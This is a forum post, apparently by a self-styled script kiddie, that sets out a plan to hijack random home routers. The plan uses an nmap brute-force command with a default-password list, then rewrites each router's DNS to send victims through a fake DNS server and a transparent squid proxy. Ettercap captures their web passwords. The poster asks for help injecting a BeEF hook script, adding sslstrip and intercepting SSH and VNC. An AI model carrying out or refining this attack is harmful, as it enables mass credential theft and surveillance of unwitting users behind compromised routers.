It seems to me, that the method i'm trying to use is quite innovative, so the google won't help me with my problems.
Here is my proposed s(r1p7k1dd13'5 ultimate grail, that is better than SET:
1. create file with some common router passwords (admin/admin, admin/12345, admin/zyxel, etc.) and name it: routers.pass. There are thousands of routers, which allow access to control panel with default password!
2. start fake dns on your host. It should resolve any domain to your IP.
3. start squid on port 80 in transparent mode. It should allow access to anyone and to anywhere (aka public proxy). It should basically take Host address from any request and send it for the client (so request to should display without any need to alter browser settings).
4. run: nmap -n -p 80 --open -T5 -iR 1000 -Pn --script http-brute --script-args brute.credfile=routers.pass,http-brute.path=/ You'll get one or two routers with default passes in a random 1000 of IP's
5. go to the LAN settings and change the router's primary DNS to your_IP. Restart the router.
6. anyone behind the router will access web through your proxy, because any domain will resolve as your IP.
7. ???
While running ettercap will capture all of the passwords for the web sites, I'm trying to solve the following problems:
1. ettercap won't modify any content (f.e. replace <title> with <title><script src="beef_hooker.js">). It just keep telling, that the content is modified, but in reality, client gets untouched squid output.
2. I haven't managed to add sslstrip functionality to the squid.
3. Interception of protocols, other than HTTP (f.e. SSH, VNC, etc.) - it is obviously possible - but what software should be used (are there any existing programs, that may help?)
Any ideas or suggestions to this method would be very welcome, as it seems like something new to play with :)